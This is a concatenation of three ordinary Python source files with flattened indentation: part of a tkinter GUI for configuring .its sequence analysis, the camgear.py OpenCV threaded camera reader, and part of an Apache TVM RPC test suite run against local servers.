self.num_threads = IntVar()
self.num_threads.set(4)
self.start_time = None
self.seq_run_results = []
# Create main frames
main_frame = ttk.Frame(self.root) # top, mid, btm frames embedded within this frame
self.top_frame = ttk.Frame(main_frame, borderwidth=5, relief="sunken", width=200, height=150)
self.mid_frame = ttk.Frame(main_frame, borderwidth=5, relief="sunken", width=200, height=300)
self.btm_frame = ttk.Frame(main_frame, borderwidth=5, relief="sunken", width=200, height=100)
# create menu
menubar = Menu(root) # create menu bar
root.config(menu=menubar) # attach menubar to root window
# file menu
file_menu = Menu(menubar) # create "File" menu item
file_menu.add_command(label="Instructions", command=self.load_instruction_window) # add a command to "Help" menu item
file_menu.add_command(label="Change Thread Count", command=self.change_threads_window)
file_menu.add_command(label="Exit", command=self.close_program) # add a command to "File" menu item
menubar.add_cascade(label="File", menu=file_menu) # attach "File" menu item to menubar
# setup main frames to grid
# top, mid, btm frames laid out inside main_frame
# sticky tags used to keep UI elements together when stretched
main_frame.grid(row=0, column=0)
self.top_frame.grid(row=0, column=0, sticky=W+E+S+N)
self.mid_frame.grid(row=1, column=0, sticky=W+E+S+N)
self.btm_frame.grid(row=2, column=0, sticky=W+E+S+N)
# Setup Individual Frames
self.setup_top_frame()
self.setup_mid_frame()
self.setup_btm_frame()
# OSX ONLY - bring window to front
if platform.system() == MAC:
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
def change_threads_window(self):
"Window for changing the number of threads used by SequenceAnalysis"
# setup
t = Toplevel(self.root)
t.resizable(False, False)
# create widgets
top_frame = Frame(t, width=100, height=50)
t.wm_title("Set Threads")
l = Label(t, text="Set number of threads to use\nwhen performing analysis: \n(default=4)")
s = Spinbox(t, from_=4, to=50, textvariable=self.num_threads, width=4)
b = ttk.Button(t, text="close", command=lambda: t.destroy(), width=4)
# arrange widgets
l.grid(row=0, column=0, padx=5, pady=7)
s.grid(row=1, column=0, sticky=W, padx=15, pady=5)
b.grid(row=1,column=0, sticky=E, padx=15, pady=5)
def change_pause_duration_up(self, event):
"Updates(+.01) pause duration variable. Bound to mid_pause_up_btn."
if self.pause_duration.get() < 10.0:
self.pause_duration.set(round(self.pause_duration.get()+0.1,1))
def change_pause_duration_down(self, event):
"Updates(-.01) pause duration variable. Bound to mid_pause_dn_btn."
if self.pause_duration.get() >= 0.1:
self.pause_duration.set(round(self.pause_duration.get()-0.1,1))
def change_pause_duration_slider(self,event):
"Updates pause duration variable. Bound to mid_pause_slider."
self.pause_duration.set(round(self.pause_duration.get(),1))
def setup_top_frame(self):
"Configure top frame. Includes save, load, reset, input, output, and output selection(txt/csv/xlsx)."
# TOP FRAME CONFIG
# Create top frame widgets
self.csv_var = BooleanVar() # holds user selection for csv output
self.txt_var = BooleanVar() # holds user selection for txt output
self.xl_var = BooleanVar() # holds user selection for xlsx output
top_dir_label = ttk.Label(self.top_frame, text="Specify Directory")
top_reset_btn = ttk.Button(self.top_frame, text="RESET", command=self.reset_config)
top_load_btn = ttk.Button(self.top_frame, text="LOAD", command=self.load_config)
top_save_btn = ttk.Button(self.top_frame, text="SAVE", command=self.save_config)
top_input_label = ttk.Label(self.top_frame, text="Input:")
top_output_label = ttk.Label(self.top_frame, text="Output:")
top_format_label = ttk.Label(self.top_frame, text="Output Format")
self.top_csv_btn = ttk.Checkbutton(self.top_frame, text='.csv', command=self.set_output_var, variable=self.csv_var,onvalue=1, offvalue=0)
self.csv_var.set(1) # set to csv default
self.top_txt_btn = ttk.Checkbutton(self.top_frame, text=".txt", command=self.set_output_var, variable=self.txt_var,onvalue=1, offvalue=0)
self.top_xl_btn = ttk.Checkbutton(self.top_frame, text=".xlsx", command=self.set_output_var, variable=self.xl_var,onvalue=1, offvalue=0)
top_filler = ttk.Label(self.top_frame, text=" ")
top_in_browse_btn = ttk.Button(self.top_frame, text="Browse...", command=self.select_input_dir) #Browse button for input directory //J
top_out_browse_btn = ttk.Button(self.top_frame, text="Browse...", command=self.select_output_dir) #Browse button for output directory //J
self.top_in_path = Entry(self.top_frame, width=20, textvariable=self.input_dir, state=DISABLED) #create the label to display input directory path //J
self.top_out_path = Entry(self.top_frame, width=20, textvariable=self.output_dir, state=DISABLED) #create the label to display output directory path //J
# setup top frame widgets
top_reset_btn.grid(row=0, column=3, sticky=E)
top_dir_label.grid(row=1, column=0, columnspan=2, sticky=N)
top_input_label.grid(row=2, column=0, sticky=E)
top_output_label.grid(row=3, column=0, sticky=E)
top_in_browse_btn.grid(row=2, column=3) #
top_out_browse_btn.grid(row=3, column=3)#
self.top_in_path.grid(row=2, column=1, columnspan=2) #
self.top_out_path.grid(row=3, column=1, columnspan=2)#
top_format_label.grid(row=5, column=0, columnspan=2)
top_filler.grid(row=4, column=0)
self.top_csv_btn.grid(row=6, column=0)
self.top_txt_btn.grid(row=6, column=1)
self.top_xl_btn.grid(row=6, column=2)
top_load_btn.grid(row=0, column=2)
top_save_btn.grid(row=0, column=1)
def change_abc_var(self, event):
"Updates var_a, var_b, or var_c. Bound to mid_abc_a_box, mid_abc_b_box, and mid_abc_a_box."
# get user selection; id -> value
selection = event.widget.curselection()
templist = []
for sel in selection:
templist.append(event.widget.get(sel))
# assign to appropriate var_
if (event.widget == self.mid_abc_a_box):
self.var_a = templist
print("A: "+str(self.var_a))
elif (event.widget == self.mid_abc_b_box):
self.var_b = templist
print("B: "+str(self.var_b))
elif (event.widget == self.mid_abc_c_box):
self.var_c = templist
print("C: "+str(self.var_c))
def setup_mid_frame(self):
"Configure mid frame. Includes sequence type selection and variable selection(a,b,c)."
# MID FRAME CONFIG
# create mid frame widgets
code_vars = StringVar(value=codes)
self.mid_abc_a_box = Listbox(self.mid_frame, height=16, listvariable=code_vars, selectmode=MULTIPLE, width=9, exportselection=False)
self.mid_abc_b_box = Listbox(self.mid_frame, height=16, listvariable=code_vars, selectmode=MULTIPLE, width=9, exportselection=False)
self.mid_abc_c_box = Listbox(self.mid_frame, height=16, listvariable=code_vars, selectmode=MULTIPLE, width=9, exportselection=False)
self.mid_abc_a_box.bind("<<ListboxSelect>>", self.change_abc_var)
self.mid_abc_b_box.bind("<<ListboxSelect>>", self.change_abc_var)
self.mid_abc_c_box.bind("<<ListboxSelect>>", self.change_abc_var)
def disable_c():
self.mid_abc_c_box.configure(state="disable")
self.mid_abc_c_box.update()
def enable_c():
self.mid_abc_c_box.configure(state="normal")
self.mid_abc_c_box.update()
mid_type_label = ttk.Label(self.mid_frame, text='Type of Analysis')
self.mid_ab_btn = ttk.Radiobutton(self.mid_frame, text='A ---> B', variable=self.sequence_type, value=AB, command=disable_c)
self.mid_abc_btn = ttk.Radiobutton(self.mid_frame, text='( A ---> B ) ---> C', variable=self.sequence_type, value=ABC, command=enable_c)
mid_filler_label = ttk.Label(self.mid_frame, text=" ")
mid_conf_label = ttk.Label(self.mid_frame, text="Configure Analysis")
mid_conf_abc_a_label = ttk.Label(self.mid_frame, text="A")
mid_conf_abc_b_label = ttk.Label(self.mid_frame, text="B")
mid_conf_abc_c_label = ttk.Label(self.mid_frame, text="C")
mid_filler_label2 = ttk.Label(self.mid_frame, text=" ")
mid_pause_label = ttk.Label(self.mid_frame, text="Pause Duration")
mid_filler_label3 = ttk.Label(self.mid_frame, text=" ")
self.mid_pause_slider = ttk.Scale(self.mid_frame, orient=HORIZONTAL, length=100, from_=0.0, to=10.0, variable=self.pause_duration,command=lambda r: self.change_pause_duration_slider(self))
mid_pause_dn_btn = ttk.Button(self.mid_frame, text="<", command=lambda: self.change_pause_duration_down(self), width=1)
mid_pause_up_btn = ttk.Button(self.mid_frame, text=">", command=lambda: self.change_pause_duration_up(self), width=1)
self.mid_pause_entry = ttk.Entry(self.mid_frame, textvariable=self.pause_duration, width=4)
self.mid_pause_checkbox = ttk.Checkbutton(self.mid_frame, text="Enable rounding", variable=self.rounding_enabled,onvalue=True, offvalue=False)
# setup mid frame widgets
mid_type_label.grid(row=0, column=0, columnspan=4)
self.mid_ab_btn.grid(row=1, column=0, columnspan=3, sticky = W)
self.mid_abc_btn.grid(row=2, column=0, columnspan=3, sticky = W)
mid_conf_abc_a_label.grid(row=3, column=0)
mid_conf_abc_b_label.grid(row=3, column=1)
mid_conf_abc_c_label.grid(row=3, column=2)
self.mid_abc_a_box.grid(row=4, column=0)
self.mid_abc_b_box.grid(row=4, column=1)
self.mid_abc_c_box.grid(row=4, column=2)
mid_filler_label3.grid(row=5, column=0, columnspan=3)
mid_pause_label.grid(row=6, column=0, columnspan=4, pady=5)
self.mid_pause_entry.grid(row=7, column=0)
self.mid_pause_slider.grid(row=7, column=1, sticky=W)
mid_pause_dn_btn.grid(row=7, column=2, sticky=E)
mid_pause_up_btn.grid(row=7, column=3, sticky=W)
self.mid_pause_checkbox.grid(row=8, column=0, pady=4, columnspan=4)
def setup_btm_frame(self):
"Configure bottom frame. Inlcudes progress bar, submit/cancel button, and message window."
# BOTTOM FRAME CONFIG
# create bottom frame widgets
self.btm_submit_btn = ttk.Button(self.btm_frame, text="Submit", command=self.start_analysis)
self.btm_progress_bar = ttk.Progressbar(self.btm_frame, orient=HORIZONTAL, length=170, mode='indeterminate')
self.btm_text_window = None
if platform.system() == MAC:
self.btm_text_window = Text(self.btm_frame, width=45, height=5)
elif platform.system() == WINDOWS:
self.btm_text_window = Text(self.btm_frame, width=34, height=5)
self.btm_text_window.config(state=DISABLED)
# arrange bottom frame widgets
self.btm_submit_btn.grid(row=0, column=0, sticky=E)
self.btm_progress_bar.grid(row=0, column=0, sticky=W)
self.btm_text_window.grid(row=1, column=0, columnspan=1)
def select_input_dir(self):
"Updates input_dir variable. Bound to top_in_browse_btn."
input_dir = tkFileDialog.askdirectory()
if input_dir:
self.input_dir.set(input_dir)
def select_output_dir(self):
"Updates output_dir variable. Bound to top_out_browse_btn."
output_dir = tkFileDialog.askdirectory()
if output_dir:
self.output_dir.set(output_dir)
def get_its_files(self):
"This method looks creates a dict of all .its files found in the input directory"
tempDict = Batch(self.input_dir.get())
for i in range(len(tempDict.items)):
tempItem = tempDict.items.popitem()
self.its_file_dict.update({tempItem[0]:tempItem[1][0]})
def check_config(self):
"This method checks if all seq_config values are set. Returns error message if any aren't set."
# check input directory
if len(str(self.top_in_path.get())) < 2:
return "Input directory not set! "
# check output directory
if len(str(self.top_out_path.get())) < 2:
return "Output directory not set! "
# check sequence_type
if str(self.sequence_type.get()) not in (AB, ABC):
return "Sequence Type not set! "
# check var_a
if not self.var_a:
return "A is not set! "
# check var_b
if not self.var_b:
return "B is not set! "
# check var_c
if (self.sequence_type.get() == ABC):
if not self.var_c:
return "C is not set! "
# check output_format
if not self.output_format:
return "Output format not set! "
else:
self.write_to_window("All config options are valid!")
return OK
def set_config(self):
"This method sets the self.seq_config variable - returns True if successful, False if unsuccessful"
# check if config options set
errorVal = self.check_config()
if errorVal != OK:
self.write_to_window(errorVal)
return False
# all config options set, so fill self.seq_config
self.seq_config['batDir'] = self.top_in_path.get()
self.seq_config['A'] = ','.join(map(str, self.var_a))
self.seq_config['B'] = ','.join(map(str, self.var_b))
self.seq_config['C'] = ','.join(map(str, self.var_c))
self.seq_config['outputContent'] = ""
self.seq_config['roundingEnabled'] = str(self.rounding_enabled.get())
self.seq_config['P'] = 'Pause'
self.seq_config['outputDirPath'] = self.top_out_path.get()
self.seq_config['seqType'] = self.sequence_type.get()
self.seq_config['PauseDur'] = str(round(self.pause_duration.get(), 1))
self.seq_config['outputTypes'] = ''.join(self.output_format)
self.write_to_window("Config options assembled!")
return True
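# A sketch of the assembled seq_config dict (this is also what a saved .leco file
# contains, since save_config writes str(self.seq_config)). The paths and code
# selections below are hypothetical examples:
#
#   {'batDir': '/path/to/its/files', 'A': 'MAN,FAN', 'B': 'CHNSP', 'C': '',
#    'outputContent': '', 'roundingEnabled': 'False', 'P': 'Pause',
#    'outputDirPath': '/path/to/output', 'seqType': 'A_B',
#    'PauseDur': '0.1', 'outputTypes': '.csv'}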
def kill_threads(self):
"Sends stop message to all threads and updates UI."
# set stopper - threads will close
self.stopper.set()
# update UI
self.btm_submit_btn.configure(text="Submit", command=self.start_analysis)
#self.enable_widgets()
self.btm_progress_bar.stop()
def watch_status(self):
"This method watches for analysis finish or user cancel. Started after pressing the submit button, but not before checking+setting seq_config."
while True:
if len(self.seq_run_results) > 0:
# configure UI
self.btm_submit_btn.configure(text="Submit", command=self.start_analysis)
#self.enable_widgets()
self.btm_progress_bar.stop()
self.write_to_window(self.seq_run_results[0] + " Ran in "+str(round(time.time()-self.start_time,2))+"s")
# reset check var
self.seq_run_results = []
self.stopper = None
break
elif self.stopper.is_set():
# alert user
self.write_to_window("Analysis Cancelled!")
# reset check var
self.seq_run_results = []
self.stopper = None
break
def start_analysis(self):
"Starts run_seqanalysis thread. run_seqanalysis needs to be run as a thread so we don't interrupt the main UI thread."
# setup
self.stopper = threading.Event()
self.btm_submit_btn.configure(state=DISABLED)
# start analysis thread
t = threading.Thread(target=self.run_seqanalysis)
t.daemon = True
t.start()
def run_seqanalysis(self):
"This method performs the sequence analysis on all .its files"
# setup
self.start_time = time.time()
#self.disable_widgets()
self.btm_progress_bar.start()
# check config
start = time.time()
r = self.set_config()
if r != True:
# set_config already output to window
self.btm_submit_btn.configure(text="Submit", command=self.start_analysis)
self.btm_submit_btn.configure(state='normal')
self.btm_progress_bar.stop()
#self.enable_widgets()
return
# retrieve .its files
self.get_its_files()
if len(self.its_file_dict) < 1:
self.write_to_window("No .its files in input directory!")
self.btm_submit_btn.configure(text="Submit", command=self.start_analysis)
self.btm_submit_btn.configure(state='normal')
self.btm_progress_bar.stop()
#self.enable_widgets()
return
# start watcher thread
th = threading.Thread(target=self.watch_status)
th.daemon = True
th.start()
# enable cancel button
self.btm_submit_btn.configure(state='normal')
self.btm_submit_btn.configure(text="Cancel", command=self.kill_threads)
# create object to send to analysis
data = SeqData(self.its_file_dict, self.seq_config, self.num_threads.get(), self.output_format)
self.seq_run_results = []
# kick off analysis
thread = threading.Thread(target=SeqAnalysis, args=(data,self.seq_run_results, self.stopper))
thread.daemon = True
thread.start()
def load_config(self):
"This method loads a config file for the program"
# file dialog - select file
config_load_file = tkFileDialog.askopenfilename(initialdir="/", title="Select config file", filetypes=(("leco files", "*.leco"), ("all files", "*.*")))
if not str(config_load_file).endswith('.leco'):
return
print("Loaded File")
# open file
new_config = None
try:
open_file = open(config_load_file, 'r')
new_config = ast.literal_eval(open_file.read())
assert type(new_config) is dict
open_file.close()
except:
self.write_to_window("Failed to Load File!")
return
print("Loaded file to config")
# check contents
try:
# check batDir
if(len(new_config['batDir']) < 2):
raise Exception("batDir invalid")
# check outputDir
if(len(new_config['outputDirPath']) < 2):
raise Exception("Invalid outputDirPath!")
# check SeqType
if new_config['seqType'] == AB:
pass
elif new_config['seqType'] == ABC:
pass
else:
raise Exception("seqType Invalid")
# check A
if not any(x in codes for x in new_config['A'].split(',')):
raise Exception("Invalid Var A")
# check B
if not any(x in codes for x in new_config['B'].split(',')):
raise Exception("Invalid Var B")
# check C
if(new_config['seqType'] == ABC):
if not any(x in codes for x in new_config['C'].split(',')):
raise Exception("Invalid Var C")
# check rounding enabled
if new_config['roundingEnabled'] == 'True':
pass
elif new_config['roundingEnabled'] == 'False':
pass
else:
raise Exception("Invalid roundingEnabled!")
# check pause
#if(new_config['Pause'] != 'Pause'):
# raise Exception("Invalid P")
# check pause duration
if(float(new_config['PauseDur']) < 0.1 ):
raise Exception("Invalid pause duration!")
# check output formats
if not any(x in new_config['outputTypes'] for x in ['csv', 'xlsx', 'txt']):
raise Exception("Invalid output types!")
except Exception as e:
self.write_to_window("FAILURE! Invalid file contents!")
print(repr(e))
return
print("Config contents checked")
# fill contents to program
self.reset_config()
## Fill Vars + seqConfig
try:
self.seq_config['batDir'] = new_config['batDir']
self.seq_config['A'] = new_config['A']
self.seq_config['B'] = new_config['B']
self.seq_config['C'] = new_config['C']
self.seq_config['roundingEnabled'] = new_config['roundingEnabled']
self.seq_config['outputDirPath'] = new_config['outputDirPath']
self.seq_config['seqType'] = new_config['seqType']
self.seq_config['PauseDur'] = new_config['PauseDur']
self.seq_config['outputTypes'] = new_config['outputTypes']
self.output_format = []
if 'xlsx' in new_config['outputTypes']:
self.output_format.append(".xlsx")
if 'csv' in new_config['outputTypes']:
self.output_format.append(".csv")
if 'txt' in new_config['outputTypes']:
self.output_format.append(".txt")
self.seq_config['outputContent'] = ""
self.seq_config['P'] = 'Pause'
print("Program variables filled")
except Exception as e:
#self.write_to_window("")
print(repr(e))
return
## Fill Widgets
try:
# input and output
self.input_dir.set(new_config['batDir'])
self.output_dir.set(new_config['outputDirPath'])
# output formats
if 'txt' in new_config['outputTypes']:
self.txt_var.set(1)
else:
self.txt_var.set(0)
if 'csv' in new_config['outputTypes']:
self.csv_var.set(1)
else:
self.csv_var.set(0)
if 'xlsx' in new_config['outputTypes']:
self.xl_var.set(1)
else:
self.xl_var.set(0)
# sequence type
self.sequence_type.set(new_config['seqType'])
# var_a/b/c
#self.mid_abc_a_box
var_a_list = new_config['A'].split(',')
for item in var_a_list:
self.mid_abc_a_box.selection_set(codes_index[item])
self.var_a.append(item)
#self.mid_abc_b_box
var_b_list = new_config['B'].split(',')
for item in var_b_list:
self.mid_abc_b_box.select_set(codes_index[item])
self.var_b.append(item)
#self.mid_abc_c_box
if new_config['seqType'] == ABC:
var_c_list = new_config['C'].split(',')
for item in var_c_list:
self.mid_abc_c_box.select_set(codes_index[item])
self.var_c.append(item)
else:
self.mid_abc_c_box.configure(state="disable")
self.mid_abc_c_box.update()
# pause duration
self.pause_duration.set(float(new_config['PauseDur']))
# rounding enabled
if new_config['roundingEnabled'] == 'True':
self.rounding_enabled.set(True)
except Exception as e:
print(repr(e))
print("FAILED TO FILL WIDGETS ON LOAD!")
print("Program Widgets filled")
# write results to screen
self.write_to_window("Successfully Loaded config file!")
def reset_config(self):
"This method resets the all program options"
# re-initialize key variables used in the UI
self.input_dir = StringVar()
self.output_dir = StringVar()
self.sequence_type = StringVar()
self.pause_duration = DoubleVar()
self.pause_duration.set(0.1)
# re-initialize the A, B, & C entry boxes
self.mid_abc_a_box.select_clear(0,END)
self.mid_abc_b_box.select_clear(0,END)
self.mid_abc_c_box.select_clear(0,END)
self.var_a = []
self.var_b = []
self.var_c = []
# re-initialize the selections
self.output_format = []
self.output_format.append(".csv")
self.csv_var.set(1)
self.txt_var.set(0)
self.xl_var.set(0)
self.rounding_enabled.set(0)
# re-initialize the selections update
self.top_csv_btn.configure(variable=self.csv_var)
self.top_txt_btn.configure(variable=self.txt_var)
self.top_xl_btn.configure(variable=self.xl_var)
self.mid_pause_checkbox.configure(variable=self.rounding_enabled)
self.top_csv_btn.update()
self.top_txt_btn.update()
self.top_xl_btn.update()
self.mid_pause_checkbox.update()
# reset the in and out dir update
self.top_in_path.configure(textvariable=self.input_dir)
self.top_out_path.configure(textvariable=self.output_dir)
self.top_in_path.update()
self.top_out_path.update()
# reset the selection to nothing selected update
self.mid_ab_btn.configure(variable=self.sequence_type)
self.mid_abc_btn.configure(variable=self.sequence_type)
self.mid_ab_btn.update()
self.mid_abc_btn.update()
# reset slider and pause_duration entry box update
self.mid_pause_slider.configure(variable=self.pause_duration)
self.mid_pause_entry.configure(textvariable=self.pause_duration)
self.mid_pause_slider.update()
self.mid_pause_entry.update()
def save_config(self):
"This method allows the user to save the program's current configuration"
if self.check_config() == OK:
self.set_config()
config_save_file = tkFileDialog.asksaveasfile(mode='w', defaultextension=".leco")
if config_save_file is None:
return  # user cancelled the save dialog
seq_config_string = str(self.seq_config)
config_save_file.write(seq_config_string)
config_save_file.close()
self.write_to_window("Configuration successfully saved! ")
else:
self.write_to_window("Unfilled configuration options!")
def load_instruction_window(self):
"This method loads a separate window with program instructions"
tkMessageBox.showinfo("Instructions", self.list_instructions())
def close_program(self):
"This method closes the program"
self.root.quit()
def write_to_window(self, message):
"This method writes text to message box"
# edit message text
self.output_msg_counter += 1
message = str(self.output_msg_counter)+": "+message +'\n'
self.output_msg = message + self.output_msg
# insert text
# we must enable window to edit contents
self.btm_text_window.config(state=NORMAL)
self.btm_text_window.delete(1.0,END)
self.btm_text_window.insert(END, self.output_msg)
self.btm_text_window.config(state=DISABLED)
def set_output_var(self):
"This method sets the output var based on the user's selection"
if self.csv_var.get() == 1:
if ".csv" not in self.output_format:
self.output_format.append(".csv")
elif self.csv_var.get() == 0:
if ".csv" in self.output_format:
self.output_format.remove(".csv")
if self.xl_var.get() == 1:
if ".xlsx" not in self.output_format:
self.output_format.append(".xlsx")
elif self.xl_var.get() == 0:
if ".xlsx" in self.output_format:
self.output_format.remove(".xlsx")
if self.txt_var.get() == 1:
if ".txt" not in self.output_format:
self.output_format.append(".txt")
elif self.txt_var.get() == 0:
if ".txt" in self.output_format:
self.output_format.remove(".txt")
def disable_widgets(self):
"This method disables top and mid widgets"
for child in self.top_frame.winfo_children():
try:
child.configure(state=DISABLED)
except:
pass
for child in self.mid_frame.winfo_children():
try:
child.configure(state=DISABLED)
except:
pass
def enable_widgets(self):
"This method enables top and mid widgets"
for child in self.top_frame.winfo_children():
try:
child.configure(state='normal')
except:
pass
for child in self.mid_frame.winfo_children():
try:
child.configure(state='normal')
except:
pass
# Listbox reset
self.mid_abc_a_box.configure(state="normal")
self.mid_abc_a_box.update()
self.mid_abc_b_box.configure(state="normal")
self.mid_abc_b_box.update()
self.mid_abc_c_box.configure(state="normal")
self.mid_abc_c_box.update()
# conditional seqType
if self.sequence_type.get() == AB:
self.mid_abc_c_box.configure(state="disable")
self.mid_abc_c_box.update()
def list_instructions(self):
instruction_var = "1) SAVE: Saves all the data currently in all fields.\n"
instruction_var += "2) LOAD: Loads the data last saved in all fields.\n"
instruction_var += "3) RESET: Empties all fields\n"
instruction_var += "4) INPUT: Browse to the directory that contains all files for analysis\n"
instruction_var += "5) OUTPUT: Browse to the desired directory for the output file\n"
instruction_var += "6) OUTPUT FORMAT: Select the desired format for output file\n"
instruction_var += "7) TYPE OF ANALYSIS: Choose the type of analysis to be done and its variables\n"
instruction_var += "\tA--->B or (A---> B)---> C: type of analysis performed\n"
instruction_var += "\tA, B, C: Drop down menus to select desired variables\n\n"
instruction_var += "8) PAUSE DURATION: Use entry field, slider bar, and/or buttons to choose pause duration\n"
instruction_var += "\tEntry field: enter in specific pause duration\n"
instruction_var += "\tSlider bar: Click and hold to move along bar\n"
instruction_var += "\tButtons(<,>): Moves slider bar by .1 in specified direction\n\n"
instruction_var += "9) ENABLE ROUNDING: Select to enable rouding\n"
instruction_var += "10) SUBMIT: Submits the current data in fields to the program to start analysis\n"
return instruction_var
|
camgear.py
|
# import the necessary packages
from threading import Thread
from pkg_resources import parse_version
import re
# Note: not all parameters are supported by all cameras, which is one of the most
# troublesome parts of the OpenCV library. Each camera type, from Android cameras to
# USB cameras to professional ones, offers a different interface for modifying its
# parameters. OpenCV therefore contains many code branches to support as many of them
# as possible, but of course not every device is covered, so not every parameter is
# guaranteed to work.
# To check the parameter values supported by your webcam, you can hook your camera
# to a Linux machine and run `v4l2-ctl -d 0 --list-formats-ext` (where 0 is the index
# of the given camera) to list the supported video formats and their values.
try:
# import OpenCV Binaries
import cv2
# check whether OpenCV Binaries are 3.x+
if parse_version(cv2.__version__) >= parse_version('3'):
pass
else:
raise ImportError('Only OpenCV library versions >= 3.0 are supported by this library')
except ImportError as error:
raise ImportError('Failed to detect OpenCV executables, install it with "pip install opencv-python" command.')
class CamGear:
"""This class targets any common IP or USB Cameras(including Raspberry Pi Compatible),
Various Video Files Formats and Network Video Streams(Including Gstreamer Raw Video Capture Pipeline)
for obtaining high-speed real-time frames by utilizing OpenCV and multi-threading."""
def __init__(self, source = 0, logging = False, time_delay = 0, **options):
# initialize the camera stream and read the first frame
self.stream = cv2.VideoCapture(source)
try:
# try to apply attributes to source if specified
for key, value in options.items():
self.stream.set(self.capPropId(key.strip()),value)
except Exception as e:
# Catch if any error occurred
if logging:
print(e)
(self.grabbed, self.frame) = self.stream.read()
# applying time delay to warm-up webcam only if specified
if time_delay:
import time
time.sleep(time_delay)
# thread initialization
self.thread=None
# initialize termination flag
self.terminate = False
def start(self):
# start the thread to read frames from the video stream
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
return self
def capPropId(self, property):
#Retrieves the Property's Integer(Actual) value.
return getattr(cv2, property)
def update(self):
# keep looping infinitely until the thread is terminated
while True:
# if the thread indicator variable is set, stop the thread
if self.terminate:
break
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
#check for valid frames
if not self.grabbed:
#no frames received, then safely exit
self.terminate = True
#release resources
self.stream.release()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be terminated
self.terminate = True
# wait until stream resources are released (producer thread might be still grabbing frame)
if self.thread is not None:
self.thread.join()
#properly handle thread exit
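# Minimal usage sketch (not part of the original module), assuming an OpenCV-visible
# camera at index 0. The option key below is a standard cv2 property name that
# capPropId() resolves via getattr(cv2, ...); the resolution value is illustrative.
if __name__ == "__main__":
    stream = CamGear(source=0, logging=True, CAP_PROP_FRAME_WIDTH=640).start()
    for _ in range(100):          # grab a bounded number of frames
        frame = stream.read()
        if frame is None:         # stream ended or could not be opened
            break
    stream.stop()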
|
test_runtime_rpc.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
import tvm.testing
import logging
import multiprocessing
import os
import stat
import sys
import time
import pytest
import numpy as np
from tvm import rpc
from tvm.contrib import utils, cc
from tvm.rpc.tracker import Tracker
if __name__ == "__main__":
# NOTE: must live here to avoid registering PackedFunc with libtvm.so twice.
sys.exit(pytest.main([__file__] + sys.argv[1:]))
# tkonolige: The issue as I understand it is this: multiprocessing's spawn
# method launches a new process and then imports the relevant modules. This
# means that all registered functions must exist at the top level scope. In
# this file they are, so all is well when we run this file directly.
# However, when run under pytest, the functions aren't registered on the
# server. I believe this is because pytest is also using multiprocessing to
# run individual functions. Somewhere along the way, the imports are being
# lost, so the server ends up not registering the functions.
pytestmark = pytest.mark.skipif(
# Windows does not support fork so we can enable Windows for testing
not sys.platform.startswith("win") and multiprocessing.get_start_method() != "fork",
reason=(
"pytest + multiprocessing spawn method causes tvm.register_func to "
"not work on the rpc.Server."
),
)
@tvm.testing.requires_rpc
def test_bigendian_rpc():
"""Test big endian rpc when there is a PowerPC RPC server available"""
host = os.environ.get("TVM_POWERPC_TEST_HOST", None)
port = os.environ.get("TVM_POWERPC_TEST_PORT", 9090)
if host is None:
return
def verify_rpc(remote, target, shape, dtype):
A = te.placeholder(shape, dtype=dtype)
B = te.compute(A.shape, lambda i: A[i] + tvm.tir.const(1, A.dtype))
s = te.create_schedule(B.op)
f = tvm.build(s, [A, B], target, name="myadd")
dev = remote.cpu(0)
a = tvm.nd.array(np.random.randint(0, 256, size=shape).astype(A.dtype), device=dev)
b = tvm.nd.array(np.zeros(shape).astype(A.dtype), device=dev)
temp = utils.tempdir()
path_dso = temp.relpath("dev_lib.o")
f.save(path_dso)
remote.upload(path_dso)
f = remote.load_module("dev_lib.o")
f(a, b)
tvm.testing.assert_allclose(a.numpy() + 1, b.numpy())
print("Test RPC connection to PowerPC...")
remote = rpc.connect(host, port)
target = "llvm -mtriple=powerpc-linux-gnu"
for dtype in ["float32", "float64", "int32", "int8"]:
verify_rpc(remote, target, (10,), dtype)
@tvm.testing.requires_rpc
def test_rpc_simple():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm._ffi.base.TVMError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
@tvm.testing.requires_rpc
def test_rpc_runtime_string():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
func = client.get_function("rpc.test.runtime_str_concat")
x = tvm.runtime.container.String("abc")
y = tvm.runtime.container.String("def")
assert str(func(x, y)) == "abcdef"
@tvm.testing.requires_rpc
def test_rpc_array():
x = np.ones((3, 4))
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
r_cpu = tvm.nd.array(x, remote.cpu(0))
assert str(r_cpu.device).startswith("remote")
np.testing.assert_equal(r_cpu.numpy(), x)
fremote = remote.get_function("rpc.test.remote_array_func")
fremote(r_cpu)
@tvm.testing.requires_rpc
def test_rpc_large_array():
    # test case for large array creation on the remote device
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
dev = remote.cpu(0)
a_np = np.ones((5041, 720)).astype("float32")
b_np = np.ones((720, 192)).astype("float32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
np.testing.assert_equal(a.numpy(), a_np)
np.testing.assert_equal(b.numpy(), b_np)
@tvm.testing.requires_rpc
def test_rpc_echo():
def check(remote):
fecho = remote.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
with pytest.raises(RuntimeError):
raise_err = remote.get_function("testing.test_raise_error_callback")("RuntimeError")
raise_err()
remote.cpu().sync()
with pytest.raises(AttributeError):
f3 = remote.system_lib()["notexist"]
